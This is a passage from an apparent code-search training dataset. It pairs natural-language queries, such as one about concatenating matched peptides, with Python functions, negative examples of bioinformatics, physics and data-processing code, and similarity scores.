require_dataset(hdf5_data, structure.H5_MAX_WAVE_FREQUENCIES, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_MAX_WAVE_FREQUENCIES_ATTR)\n dset[0] = float(x2[2])\n idx += 1\n x2 = x1[idx].split()\n dset = require_dataset(hdf5_data, structure.H5_NUM_WAVE_DIRECTIONS, (1,), dtype=settings.NEMOH_INT)\n set_hdf5_attributes(dset, structure.H5_NUM_WAVE_DIRECTIONS_ATTR)\n dset[0] = int(x2[0])\n\n dset = require_dataset(hdf5_data, structure.H5_MIN_WAVE_DIRECTIONS, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_MIN_WAVE_DIRECTIONS_ATTR)\n dset[0] = float(x2[1])\n\n dset = require_dataset(hdf5_data, structure.H5_MAX_WAVE_DIRECTIONS, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_MAX_WAVE_DIRECTIONS_ATTR)\n dset[0] = float(x2[2])\n\n idx += 2\n x2 = x1[idx].split()\n\n dset = require_dataset(hdf5_data, structure.H5_COMPUTE_IRF, (1,), dtype=settings.NEMOH_INT)\n set_hdf5_attributes(dset, structure.H5_COMPUTE_IRF_ATTR)\n dset[0] = int(x2[0])\n\n dset = require_dataset(hdf5_data, structure.H5_IRF_TIME_STEP, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_IRF_TIME_STEP_ATTR)\n dset[0] = float(x2[1])\n dset = require_dataset(hdf5_data, structure.H5_IRF_DURATION, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_IRF_DURATION_ATTR)\n dset[0] = float(x2[2])\n\n idx += 1\n x2 = x1[idx].split()\n dset = require_dataset(hdf5_data, structure.H5_SHOW_PRESSURE, (1,), dtype=settings.NEMOH_INT)\n set_hdf5_attributes(dset, structure.H5_SHOW_PRESSURE_ATTR)\n dset[0] = int(x2[0])\n\n idx += 1\n x2 = x1[idx].split()\n dset = require_dataset(hdf5_data, structure.H5_KOCHIN_NUMBER, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_KOCHIN_NUMBER_ATTR)\n dset[0] = float(x2[0])\n dset = require_dataset(hdf5_data, structure.H5_KOCHIN_MIN, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_KOCHIN_MIN_ATTR)\n dset[0] = float(x2[1])\n dset = require_dataset(hdf5_data, structure.H5_KOCHIN_MAX, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_KOCHIN_MAX_ATTR)\n dset[0] = float(x2[2])\n\n\n idx += 1\n x2 = x1[idx].split()\n dset = require_dataset(hdf5_data, structure.H5_FREE_SURFACE_POINTS_X, (1,), dtype=settings.NEMOH_INT)\n set_hdf5_attributes(dset, structure.H5_FREE_SURFACE_POINTS_X_ATTR)\n dset[0] = int(x2[0])\n dset = require_dataset(hdf5_data, structure.H5_FREE_SURFACE_POINTS_Y, (1,), dtype=settings.NEMOH_INT)\n set_hdf5_attributes(dset, structure.H5_FREE_SURFACE_POINTS_Y_ATTR)\n dset[0] = int(x2[1])\n dset = require_dataset(hdf5_data, structure.H5_FREE_SURFACE_DIMENSION_X, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_FREE_SURFACE_DIMENSION_X_ATTR)\n dset[0] = float(x2[2])\n dset = require_dataset(hdf5_data, structure.H5_FREE_SURFACE_DIMENSION_Y, (1,), dtype=settings.NEMOH_FLOAT)\n set_hdf5_attributes(dset, structure.H5_FREE_SURFACE_DIMENSION_Y_ATTR)\n dset[0] = float(x2[3])", "def process_stat_files(param):\n\n #get the files that are actually in the output directory\n call = ['cp', '-R']\n call.append(param['working_dir']+'results/featureCount/')\n call.append(param['working_dir']+'report/')\n _, _ = subprocess.Popen(call,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE).communicate()\n\n featurecount_file = (param['working_dir']+\n 'results/featureCount/featureCount_stats.txt')\n #extract table\n table = []\n filehandle = open(featurecount_file)\n #header\n table.append(filehandle.readlines()[0].rstrip().split('\\t'))\n table[0] = table[0][1:]\n filehandle.close()\n\n #total number of aligned reads\n tot_reads = param['bam_qc']['unique_aligned_reads']\n counter = [0] * len(param['bam_qc']['unique_aligned_reads'])\n \n filehandle = open(featurecount_file)\n for line in filehandle.readlines()[1:]:\n cur_line = line.rstrip().split('\\t')\n cur_line[0] = re.sub(r'_',' ',cur_line[0])\n if cur_line[0] not in ['Unassigned MultiMapping','Assigned']:\n counter = [ct + int(cr) for ct, cr in zip(counter, cur_line[1:])]\n perc = ([cur_line[0]]+\n MODULE_HELPER.get_percentage(cur_line[1:],\n tot_reads,\n len(cur_line)-1))\n table.append(perc)\n filehandle.close()\n assigned = [tot_reads[idx] - counter[idx] for idx in range(len(tot_reads))]\n perc = ['Assigned'] + MODULE_HELPER.get_percentage(assigned,\n tot_reads,\n len(counter))\n return table", "def write_gct_file(output_file, class_names, class_counts, expression_matrix):\n total_genes = len(expression_matrix)\n first_key = list(expression_matrix.keys())[0]\n total_samples = len(expression_matrix[first_key])\n\n headers = ['NAME', 'DESCRIPTION']\n\n for c_name, c_count in zip(class_names, class_counts):\n for i in range(c_count):\n headers.append('{}_{}'.format(c_name, i + 1))\n\n with open(output_file, 'w') as f:\n f.write('#1.2\\n')\n f.write('{} {}\\n'.format(total_genes, total_samples))\n f.write('\\t'.join(headers))\n f.write('\\n')\n\n for g_name, values in expression_matrix.items():\n f.write(g_name)\n f.write('\\tna\\t')\n f.write('\\t'.join(\n ['{0:.2f}'.format(v) for v in values]\n ))\n f.write('\\n')", "def generate_encryption_statistics():\n print(\"\\nGeneration of the encryption statistics:\")\n\n # Password\n password = 'password'\n\n # The table of the results\n results = []\n\n # For every filesize, generate the file\n for key in FILESIZES:\n results.append(\n cipher_execution(\n '-c',\n DATASET_DIR+key+DATASET_EXTENSION,\n DATASET_DIR+key+CIPHERED_EXTENSION,\n password\n )\n )\n\n line_chart = pygal.Line()\n line_chart.title = 'Execution time of encryption in sequential mode'\n line_chart.x_title = 'Size of input file'\n line_chart.x_labels = FILESIZES\n line_chart.y_title = 'Execution time in seconds'\n line_chart.add('Time', results)\n line_chart.render_to_png(REPORT_DIR+'encryption_sequential.png')", "def __convert_file_size(self, file_size:float)->float:\n return file_size * 1000000", "def main(output_file):\n with open(output_file, 'w+') as fl:\n poor_perf_stats = pstats.Stats('poor_perf.log', stream=fl)\n good_perf_stats = pstats.Stats('good_perf.log', stream=fl)\n\n poor_perf_stats.sort_stats('cumtime')\n\n fl.write('--------------------------------------------\\n')\n fl.write('POOR PERFORMANCE STATS\\n')\n fl.write(f\"Time: {poor_perf_stats.total_tt}\\n\")\n fl.write(f\"Function Calls: {poor_perf_stats.total_calls}\\n\")\n fl.write(f\"Top cumulative times\\n\")\n poor_perf_stats.print_stats(20)\n\n fl.write('--------------------------------------------\\n')\n fl.write('GOOD PERFORMANCE STATS\\n')\n fl.write(f\"Time: {good_perf_stats.total_tt}\\n\")\n fl.write(f\"Function Calls: {good_perf_stats.total_calls}\\n\")\n fl.write(f\"Top 20 cumulative times\\n\")\n good_perf_stats.print_stats(20)", "def process(cline, rline, file1, file2, file3, library_sizes):\n cparts = cline.split(\"\\t\")\n rparts = rline.split(\"\\t\")\n\n # confirm that the two lines being processed are for the same locus\n assert(cparts[0] == rparts[0] and cparts[1] == rparts[1])\n\n # split first column (locus) into three columns containing its\n # consituent parts (chromosome, start base, and end base)\n chr = rparts[0].split(\":\")[0]\n start = rparts[0].split(\":\")[1].split(\"-\")[0]\n end = rparts[0].split(\":\")[1].split(\"-\")[1]\n\n line1 = [chr, start, end] + rparts[1:] + cparts[2:] # counts in reads\n line2 = [chr, start, end] + rparts[1:] + [cparts[2]] # counts in rpm\n line3 = [chr, start, end] + rparts[1:] + [cparts[2]] # counts in rpkm\n\n gene_length = int(rparts[2])\n\n for i in range(3, len(cparts)):\n\n index = i - 3\n lib_size = library_sizes[index][1]\n\n mapped_reads = int(cparts[i])\n\n if lib_size == 0: # Prevent DIVBYZERO error\n rpm = 0\n rpkm = 0\n elif gene_length == 0:\n rpkm = 0\n else:\n rpm = ((mapped_reads * (10 ** 6)) / lib_size)\n rpkm = ((mapped_reads * (10 ** 9)) / (lib_size * gene_length))\n\n line2 += [str(rpm)]\n line3 += [str(rpkm)]\n\n out1 = \"\\t\".join(line1) + \"\\n\"\n out2 = \"\\t\".join(line2) + \"\\n\"\n out3 = \"\\t\".join(line3) + \"\\n\"\n\n file1.write(out1)\n file2.write(out2)\n file3.write(out3)", "def estimateOutputSize(scriptSize):\n return 8 + 2 + wire.varIntSerializeSize(scriptSize) + scriptSize", "def chunk(wb_run,sample_run,ei_guess,rebin,mapingfile,nchunk,**kwargs):\n global reducer,rm_zero,inst_name,van_mass,bleed_switch,rate,pixels\n print 'DGreduce run for ',inst_name,'run number ',sample_run\n try:\n n,r=lhs('both')\n wksp_out=r[0]\n except:\n if sample_run == 0:\n #deal with the current run being parsed as 0 rather than 00000\n sample_run='00000'\n wksp_out=inst_name+str(sample_run)+'.spe'\n if kwargs.has_key('sum') and kwargs.get('sum')==True:\n wksp_out=inst_name+str(sample_run[0])+'sum'+'.spe'\n \n start_time=time.time()\n \n if sample_run=='00000' and mtd.doesExist(inst_name+'00000.raw')==True:\n print 'Deleteing previous instance of temp data'\n DeleteWorkspace(Workspace=inst_name+'00000.raw')\n \n \n reducer.energy_bins = rebin\n \n mon_list1=reducer.ei_mon_spectra\n mon_list2=reducer.mon1_norm_spec\n mon_list1.append(mon_list2)\n #mon_list1.sort()\n print 'Monitors for this chunk are: ',mon_list1\n # monitors for merlin[69634,69638]\n \n if inst_name == 'MER':\n #number of spectrums per instrument and where the detectors start (i.e. 5 for mari but 1 for merlin)\n numspec=69632\n spectrum_start=1\n if inst_name == 'MAP':\n #number of spectrums per instrument and where the detectors start (i.e. 5 for mari but 1 for merlin)\n numspec=41472\n spectrum_start=1\n \n if kwargs.has_key('det_cal_file'):\n cal_file = kwargs.get('det_cal_file') \n else:\n print 'Setting detector calibration to detector block info from ', sample_run\n \n reducer.det_cal_file =None\n reducer.relocate_dets = False\n nums=range(spectrum_start,numspec,nchunk)\n output_wkspName=wksp_out\n for i in nums:\n print '=========================================================================='\n print 'start spectra for this chunk',i\n chunk=range(i,i+nchunk)\n endIndex=nchunk-1\n if i+nchunk > numspec:\n chunk=range(i,numspec+1)\n endIndex=len(chunk)-1\n print 'end spectra for this chunk ', i+endIndex\n \n speclist=mon_list1+chunk\n #print speclist\n LoadRaw(Filename=wb_run,OutputWorkspace=\"wb_wksp\",LoadLogFiles=\"0\",SpectrumList=speclist)\n \n LoadRaw(Filename=sample_run,OutputWorkspace=\"run_wksp\",LoadLogFiles=\"0\",SpectrumList=speclist)\n \n tmp=arb_units(\"wb_wksp\",\"run_wksp\",ei_guess,rebin,'none_for_this_run_type',one2one=True,bleed=False,**kwargs)\n \n \n DeleteWorkspace(Workspace=\"wb_wksp\")\n DeleteWorkspace(Workspace=\"run_wksp\")\n #DeleteWorkspace(\"_wksp.spe\")\n #DeleteWorkspace(\"_wksp.spe-white\")\n \n if i == spectrum_start:\n #crop the workspace to remove the monitors, the workpsace seems sorted on specnumber so this is ok for instruments where the monitors are at the end of the \n # spectrum list\n CropWorkspace(InputWorkspace=tmp,OutputWorkspace=wksp_out,StartWorkSpaceIndex=0,EndWorkSpaceIndex=endIndex)\n else:\n CropWorkspace(InputWorkspace=tmp,OutputWorkspace=tmp,StartWorkSpaceIndex=0,EndWorkSpaceIndex=endIndex)\n ConjoinWorkspaces(InputWorkspace1=wksp_out,InputWorkspace2=tmp,CheckOverlapping='0')\n print int(((float(i+endIndex))/float(numspec))*100),'% complete'\n print '===============================================================================' \n \n GroupDetectors(InputWorkspace=output_wkspName,OutputWorkspace=output_wkspName,MapFile=mapingfile)\n\n \n \n print 'Elapsed time =',time.time()-start_time, 's'\n return mtd[wksp_out]", "def save(self, filename=None):\n\n if not filename:\n filename = self.name+\".lib\"\n\n to_write = []\n\n to_write += \"EESchema-LIBRARY Version 2.3\\n#encoding utf-8\\n\"\n\n to_write += self.output()\n\n to_write += \"#\\n#End Library\\n\"\n\n library_file = open(filename, 'w')\n library_file.writelines(to_write)\n library_file.close()", "def open_template(template_file, path_in):\n\n os.chdir(path_in)\n \n coelution_list = []\n quality_list = []\n experiment_list = []\n\n with open(template_file) as csv_template:\n csv_reader = csv.reader(csv_template, delimiter = \",\")\n line_count = 0\n sum_size = 0\n sum_number_of_spectra = 0\n\n for row in csv_reader:\n if line_count == 0:\n pass\n \n else:\n print(line_count)\n list_of_values_in = row\n\n name = list_of_values_in[0][:-2]\n name_file = name + \".mzML\"\n retention_time_window = list_of_values_in[2]\n retention_time = ip.rt_window_to_delta(retention_time_window)\n quality = list_of_values_in[4]\n mz_precursor = float(list_of_values_in[5])\n delta_mz = 1.3\n mz_in_template = list(filter(lambda x: x != \"\", list_of_values_in[9:]))\n\n ms2_spectra_found = cp.find_spectra_by_mz_and_rt(name_file, mz_precursor, retention_time[0], delta_mz, retention_time[1])\n print(\"Number of MS2 spectra found:\", len(ms2_spectra_found))\n\n precursor_list_ms2 = list()\n for spectrum in ms2_spectra_found:\n for mz in spectrum.get_precursor_mz():\n precursor_list_ms2.append(mz)\n\n print(\"Precursor list:\", precursor_list_ms2)\n precursor_ms2 = statistics.mode(precursor_list_ms2)\n print(\"Precursor found:\", precursor_ms2)\n\n spectra_found = cp.find_spectra_by_mz_and_rt(name_file, mz_precursor, retention_time[0], delta_mz, retention_time[1], ms_level_1 = True)\n print(\"Number of MS1 spectra found:\", len(spectra_found))\n print(\"sizes:\")\n for spectrum in spectra_found:\n print(spectrum.get_size())\n \n average_spectrum = cp.average_spectra_ordered(spectra_found, 0.03)\n\n # We sort the spectrum by mz\n\n coelution = is_coelution(average_spectrum, precursor_ms2)\n \n coelution_list.append(coelution)\n quality_list.append(quality)\n experiment_list.append(name)\n \n line_count += 1\n \n for i in range(0, len(coelution_list)):\n print(\"Experiment name:\", experiment_list[i])\n print(\"Quality:\", quality_list[i])\n print(\"Coelution:\", coelution_list[i])\n print()", "def sum_simulated_test():\n f = open(\"./results/simulated_sigmoid_sum.csv\", \"w\")\n #f1 = open(\"./results/avg_pres.txt\", \"w\")\n #f.write(\"num. of qubits; precision\\n\")\n\n\n computable_qubits = 27\n num_subtest = 1000\n\n acum_precision = 0\n coeffs = []\n temp = -10\n while temp < 11:\n coeffs.append(temp)\n temp += 0.25\n #for coeff in coeffs:\n # variables.c_summation = coeff\n # print(coeff)\n for i in range(2, computable_qubits):\n #print(\"qubit: \", i)\n precision = 0\n x = []\n for j in range(num_subtest):\n\n random_dict = get_random_dict(i)\n\n # compute real answer\n real_answer = 0\n for value in random_dict.values():\n real_answer += value\n # f1.write(str(real_answer)+\";\")\n x.append(real_answer)\n\n # assign spin value to real_answer\n if real_answer < 0:\n real_answer = -1\n elif real_answer > 0:\n real_answer = 1\n else:\n real_answer = 0\n bqm = get_bqm()\n quantum_sigmoid_sum(bqm, random_dict, \"target\")\n sampler = get_simulated_sampler()\n result = sampler.sample(bqm)\n if real_answer == 0:\n precision += 1\n # f1.write(\"1\\n\")\n elif real_answer == result.first.sample['target']:\n precision += 1\n # f1.write(\"1\\n\")\n# else:\n # f1.write(\"0\\n\")\n\n precision /= num_subtest\n # acum_precision+= precision\n\n f.write(str(i) + \";\" + str(precision) + \"\\n\")\n f.close()\n #f1.write(str(coeff)+\";\"+ str(round(acum_precision/(computable_qubits-1), 4)) + \"\\n\")\n # acum_precision = 0\n #f1.close()", "def main(inp_f, out_f):\n\n output = open(out_f, \"w\")\n\n with open(inp_f) as f:\n\n print(\"Processing and creating plots. This may take a while depending \"\n \"on the number of lines of input.\")\n\n # Piece together new header.\n header = f.readline().strip().split(\"\\t\")\n new_header_samps = \"\\t\".join([x.split(\"_\")[0] + \"_SDs_AROUND_MEAN\" for x in header[\n 5:]]) + \"\\t\" + \"\\t\". join([x.split(\"_\")[0] + \"_MADs_AROUND_MEDIAN\" for x in header[5:]])\n new_header = \"\\t\".join(header) + \"\\t\" + \"MEAN\" + \"\\t\" + \"SD\" + \\\n \"\\t\" + \"MEDIAN\" + \"\\t\" + \"MAD\" + \"\\t\" + new_header_samps\n print(new_header, file=output)\n\n for line in f:\n line = line.strip().split(\"\\t\")\n se_id = \"SE \" + str(line[3])\n # Assumes actual data starts in 6th column.\n data = [float(x) for x in line[5:]]\n se_samples = line[4].split(\";\")\n\n # Mean and std_dev of signal for that line.\n p_mean, p_stdev = calc_mean_stdev(data)\n p_median, p_mad = calc_median_mad(data)\n\n # Get MADs from mean for each sample.\n if p_mad == 0:\n mad_diffs = [\"NA\" for x in data]\n out_mad_diffs = \"\\t\".join(mad_diffs)\n else:\n mad_diffs = [((x - p_median) / p_mad) for x in data]\n out_mad_diffs = \"\\t\".join(\n [\"{0:.4f}\".format(float(x)) for x in mad_diffs])\n\n # Make plot.\n x_label = \"MADs around Mean\"\n prefix = \"MAD\"\n make_distplot(mad_diffs, out_f, se_id, x_label, prefix)\n\n # Get SDs from mean for each sample.\n if p_stdev == 0:\n sd_diffs = [\"NA\" for x in data]\n out_sd_diffs = \"\\t\".join(sd_diffs)\n else:\n sd_diffs = [((x - p_mean) / p_stdev) for x in data]\n out_sd_diffs = \"\\t\".join(\n [\"{0:.4f}\".format(float(x)) for x in sd_diffs])\n\n # Make plot.\n x_label = \"SDs around Mean\"\n prefix = \"SD\"\n make_distplot(sd_diffs, out_f, se_id, x_label, prefix)\n\n new_line = (\"\\t\".join(line) + \"\\t\" + \"{0:.4f}\".format(\n float(p_mean)) + \"\\t\" + \"{0:.4f}\".format(float(p_stdev)) +\n \"\\t\" + \"{0:.4f}\".format(float(p_median)) + \"\\t\" +\n \"{0:.4f}\".format(float(p_mad)) + \"\\t\" + out_sd_diffs +\n \"\\t\" + out_mad_diffs)\n\n print(new_line, file=output)\n\n output.close()" ]
[ "0.54608756", "0.5400242", "0.5211215", "0.5197263", "0.5194946", "0.51773113", "0.51361793", "0.51357317", "0.5126693", "0.5125787", "0.5115333", "0.51034206", "0.5085765", "0.50600755", "0.5036529", "0.5036529", "0.5028773", "0.50280166", "0.5021801", "0.50140125", "0.5008585", "0.4992779", "0.49831247", "0.4980833", "0.49437845", "0.49324223", "0.4924867", "0.49179706", "0.49059483", "0.49037325", "0.48906454", "0.4886999", "0.48818204", "0.48774618", "0.4873023", "0.4868931", "0.4867491", "0.4866731", "0.48645657", "0.4859617", "0.48487145", "0.48370066", "0.4834187", "0.48323077", "0.48256272", "0.48196673", "0.48128495", "0.48080227", "0.47842348", "0.47822896", "0.47820675", "0.477544", "0.4766118", "0.47642002", "0.4757987", "0.47573507", "0.47493166", "0.47418302", "0.47392398", "0.47310078", "0.47306147", "0.47173715", "0.4710617", "0.4695366", "0.4686759", "0.46818596", "0.46608755", "0.46501836", "0.46470445", "0.4644188", "0.4639106", "0.46343076", "0.46265355", "0.46262354", "0.4626006", "0.46248436", "0.46138352", "0.4609842", "0.46072602", "0.46065107", "0.46021485", "0.45993403", "0.4598147", "0.4597577", "0.45954952", "0.4590095", "0.45884407", "0.45860797", "0.45851234", "0.45818153", "0.45817935", "0.458009", "0.45758808", "0.45754322", "0.45749953", "0.4574026", "0.45731035", "0.45730135", "0.45672247", "0.4557956" ]
0.6827684
0
Get the concatenated peptide from possible match peptide.
def get_concat_peptide(front_coord_pair, back_coord_pair, front_peptide, back_peptide, strand, k=None): def get_longest_match_position(front_str,back_str,L=None): if L is None: L = min(len(front_str),len(back_str)) for i in reversed(list(range(1,L+1))): if front_str[-i:] == back_str[:i]: return i return None if strand == '+': front_coord = front_coord_pair.stop_v2 back_coord = back_coord_pair.start_v1 else: front_coord = front_coord_pair.start_v2 back_coord = back_coord_pair.stop_v1 if abs(front_coord-back_coord) % 3 == 0: if front_coord == back_coord: # no intersection and we concatenate them directly new_peptide = front_peptide + back_peptide else: pep_common_num = get_longest_match_position(front_peptide,back_peptide,L=k) if pep_common_num is None: new_peptide = '' else: new_peptide = front_peptide + back_peptide[pep_common_num:] return new_peptide else: return ''
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def concatenate(self):\n if not self.match_count:\n # No concatenating if there are no matches\n return []\n if self.match_count <= 1:\n # Can't combine a single match\n return self.match_list\n # Setup for iterating through\n cont = True\n first = self.match_list[self.i]\n second = self.match_list[self.j]\n while cont and self.match_count > 2:\n first, second, cont = self._process_main()\n\n # Last block is a special case\n self._process_last(first, second)\n return self.combined", "def return_peptide (RNA):\n\t# Should work with already made sequence without stop codons. Only one peptide per call\n\n\tdna.isNucleotide(RNA)\n\tif 'T' in RNA: raise dna.InvalidSequenceError\t\n\tpeptide = \"\"\n\tid = 0\n\twhile id < len(RNA):\n\t\ttRNA = RNA[id:id+3]\n\t\tif not tRNA in RNA_code: break\n\t\tAA = RNA_code[tRNA]\n\t\tif AA == False: # In the case if was mistake in the previous step\n\t\t\tbreak\n\t\tpeptide += AA\n\t\tid += 3\t\n\treturn peptide", "def possible_subpeptides(self):\n ret = [\"\"]\n protein_len = len(self.protein)\n for l in range(1, protein_len):\n for i in range(protein_len):\n if i + l <= protein_len:\n ret += [self.protein[i : i+l]]\n else:\n ret += [self.protein[i:] + self.protein[:(i+l)%protein_len]]\n ret += [self.protein]\n return ret", "def get_match_str(self, match):\n return \"\"", "def join(self) -> List[Dict[str, Any]]:\n return self.matched + self.unmatched", "def protein_from_orfs(dna):\n rna = dna.replace(\"T\", \"U\")\n reverse_complement_rna = complement_strand(dna).replace(\"T\", \"U\")\n\n candidate_proteins = set()\n\n for strand in [rna, reverse_complement_rna]:\n for index in [m.start() for m in re.finditer('AUG', strand)]:\n codons_list = codons(strand[index:])\n protein = \"\"\n\n if any(rna_codon_dict[codon] == \"Stop\" for codon in codons_list):\n for codon in codons_list:\n symbol = rna_codon_dict[codon]\n\n if symbol != \"Stop\":\n protein += symbol\n else:\n candidate_proteins.add(protein)\n break\n\n return candidate_proteins", "def primary(self):\n return Seq(''.join([r.aa for r in self.residues]), protein_alphabet)", "def getCodonSeqs(self):\r\n combinations = list(self.codonTable[aa] for aa in self.peptide) # creates a list of possible codons based on AA\r\n self.allPepSeqs = list(''.join(codon) for codon in itertools.product(*combinations)) # creates list of peptides\r\n return", "def _get_prep_with_word(token: spacy.tokens.Token) -> (str, spacy.tokens.Token):\n if token is None:\n return \"\", None\n\n prep = None\n # search of prepositions\n for child in token.rights:\n if child.dep_ == \"prep\":\n prep = child\n break\n if prep is None:\n return \"\", None\n\n for word in prep.children:\n # if preposition has child of type 'object of preposition' or 'complement of a preposition'\n # then add it to the result\n if word.dep_ in [\"pobj\", \"pcomp\"]:\n chunk_str = SpacyEventExtractor._get_chunk(word)\n return str(prep) + \" \" + chunk_str, word\n\n return \"\", None", "def challenge2(self):\n # Remove one letter at each position from each ID and plonk them in a set\n match_possibilities = set()\n for id in self.lines:\n sub_ids = set()\n for letter_pos in range(len(id)):\n sub_ids.add(id[:letter_pos] + id[(letter_pos + 1):])\n \n matching_letters = match_possibilities.intersection(sub_ids)\n if matching_letters:\n break\n\n match_possibilities.update(sub_ids)\n\n # If the current one matches\n print(f\"Matching letters: {matching_letters.pop()}\")", "def makePeptideOutputLine(self, protein, peptide):\n outputList = self.makePeptideOutputList(protein, peptide)\n outputString = \"%s\\n\" % '\\t'.join(str(x) for x in outputList)\n return outputString", "def elementCom(Paire1,Paire2) :\n elem_com=\" \"\n elementPaire1=\" \"\n elementPaire2=\" \"\n p1 = Paire1[1]\n p2 = Paire2[1]\n if p1 != p2 :\n for i in range (2):\n for j in range (2):\n if p1[i] == p2[j]:\n elem_com = p1[i] \n elementPaire1 = p1[1-i] \n elementPaire2 = p2[1-j] \n return elem_com, elementPaire1, elementPaire2", "def get_true_propositions(self):\n current_loc = self.objects.get((self.agent.i,self.agent.j), \"\")\n if current_loc: # taxi at location\n loc_i = \"abcd\".index(current_loc.lower())\n if self.passenger == current_loc: # passenger at location\n return Traces.letters[loc_i+4]\n else: # passenger in taxi or elsewere\n return Traces.letters[loc_i]\n else: # taxi in transit\n return \"\"\n\n # ret = self.objects.get((self.agent.i,self.agent.j), \"\").lower()\n # ret += \"efgh\"[\"abcd\".index(self.destination.lower())]\n # if self.passenger is not None: # at location\n # ret += \"ijkl\"[\"abcd\".index(self.passenger.lower())]\n # else: # in taxi\n # ret += \"m\"\n # return ret", "def _bpe(self, token):\n if token in self._cache:\n return self._cache[token]\n\n if self._suffix:\n word = tuple(token[:-1]) + (token[-1] + self._suffix,)\n else:\n word = tuple(token)\n\n pairs = get_pairs(word)\n\n if not pairs:\n if self._suffix:\n return token + self._suffix\n else:\n return token\n\n while True:\n bigram = min(pairs, key=lambda pair: self._bpe_ranks.get(pair, float(\"inf\")))\n if bigram not in self._bpe_ranks:\n break\n first, second = bigram\n new_word = []\n i = 0\n while i < len(word):\n try:\n j = word.index(first, i)\n except ValueError:\n new_word.extend(word[i:])\n break\n else:\n new_word.extend(word[i:j])\n i = j\n\n if word[i] == first and i < len(word) - 1 and word[i + 1] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n new_word = tuple(new_word)\n word = new_word\n if len(word) == 1:\n break\n else:\n pairs = get_pairs(word)\n word = \" \".join(word)\n self._cache[token] = word\n return word", "def cc_matcher_fragment (cls) :\n sk = lambda cc : (- len (cc), cc)\n ccs = sorted (cls.cc_map, key = sk)\n result = \"\".join ((\"(?P<cc>\", \"|\".join (ccs), \")\"))\n return result", "def get_next_protein(self):\n return self.proteins.pop()", "def get_protein_fasta(uniprot_id):\r\n url = \"http://www.uniprot.org/uniprot/{}.fasta\".format(uniprot_id)\r\n string = re.split(\"\\n\",ur.urlopen(url).read().decode(),1)[1]\r\n return re.sub(\"\\n\",\"\",string)", "def part2(data: str = None) -> str:\n idlist: List[IDProfiler] = getidlist(data)\n for i in range(len(idlist)):\n for j in range(i + 1, len(idlist)):\n shared: str = idlist[i].sharedletters(idlist[j])\n if len(shared) is len(idlist[i].rawstr) - 1:\n return shared", "def combine_permutations(p1, p2):\n p = tuple(map(p2.__getitem__, p1))\n return p", "def dummy_junction14():\n return \"junction:chr1:176-324:+\"", "def find_let(ph_number, numb_counter):\n numb_i = int(ph_number[numb_counter])\n new_str = LETTER_ARRAY[numb_i]\n if numb_counter+1 != len(ph_number):\n res_s = map(''.join, itertools.product(new_str, find_let(ph_number, numb_counter+1)))\n else:\n return new_str\n return res_s", "def combine(self, token):\n if token==None:\n return None\n retval = ''\n for tok in token:\n if isinstance(tok, list):\n retval+=self.combine(tok)\n else:\n retval+=tok\n return retval", "def generate_full_chain(chain):\n list_of_subchains = [extract_amino_acids(subchain) for subchain in chain]\n # Join list into single string separated by spaces\n return ' '.join(list_of_subchains)", "def bpe(self, word: List[str]) -> List[str]:\n pairs = self.get_pairs(word)\n\n if len(pairs) == 0:\n return word\n\n while True:\n min_rank = self.bpe_ranks.get('\\n'.join(pairs[0]), float('inf'))\n bigram = pairs[0]\n for pair in pairs[1:]:\n current_rank = self.bpe_ranks.get('\\n'.join(pair), float('inf'))\n if current_rank < min_rank:\n min_rank = current_rank\n bigram = pair\n if '\\n'.join(bigram) not in self.bpe_ranks:\n break\n first, second = bigram\n new_word: List[str] = []\n i = 0\n while i < len(word):\n found = False\n for j in range(i, len(word)):\n if word[j] == first:\n new_word.extend(word[i:j])\n i = j\n found = True\n break\n if not found:\n new_word.extend(word[i:])\n break\n\n if word[i] == first and i < len(word) - 1 and word[i + 1] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n word = new_word.copy()\n if len(word) == 1:\n break\n else:\n pairs = self.get_pairs(word)\n return word", "def join_team(team: List[TeambuilderPokemon]) -> str:\n return \"]\".join([mon.formatted for mon in team])", "def disambiguate(self, word):\n matches = re.match(r'^pen([cdjz])(.*)$', word)\n if matches:\n return matches.group(1) + matches.group(2)", "def dummy_junction13():\n return 'junction:chr1:176-299:+'", "def get_candidates(self):\n return u', '.join([c.identifier for c in self.candidates.all()])", "def printEncodePep(self):\r\n for i in range(len(self.seq)):\r\n if self.seq[i:i+(len(self.peptide*3))] in self.allPepSeqs:\r\n print(self.seq[i:i+(len(self.peptide*3))]) # print peptide if DNA region matches a possible peptide\r\n return", "def dummy_junction24():\n return 'junction:chr1:251-399:+'", "def dummy_junction12():\n return \"junction:chr1:176-224:+\"", "def sequence_from_thresh(match):\n if len(match) == 0:\n print(\"Couldn't find any audio in input clip\")\n exit(0)\n\n sequences = []\n cur_seq = [match[0]]\n cur_id = 1\n\n while cur_id < len(match):\n if match[cur_id] == match[cur_id - 1] + 1:\n cur_seq.append(match[cur_id])\n if cur_id == len(match) - 1:\n sequences.append(cur_seq)\n break\n else:\n sequences.append(cur_seq)\n cur_seq = [match[cur_id]]\n\n cur_id += 1\n if len(sequences) == 0:\n return [(match[0], match[0])]\n\n sequences = [(x[0], x[-1]) for x in sequences]\n\n return sequences", "def get_complement(nucleotide):\n if nucleotide == 'A':\n return 'T'\n elif nucleotide == 'C':\n return 'G'\n elif nucleotide == 'G':\n return 'C'\n elif nucleotide == 'T':\n return 'A'\n else:\n return None", "def translation (RNA):\n\tresult = []\n\tif len(RNA) == 0: return result\n\tdna.isNucleotide(RNA)\n\tif \"T\" in RNA: raise dna.InvalidSequenceError\n\n\torf = dna.get_orf(RNA)\n\n\tfor frame in orf:\n\t\tpeptide = 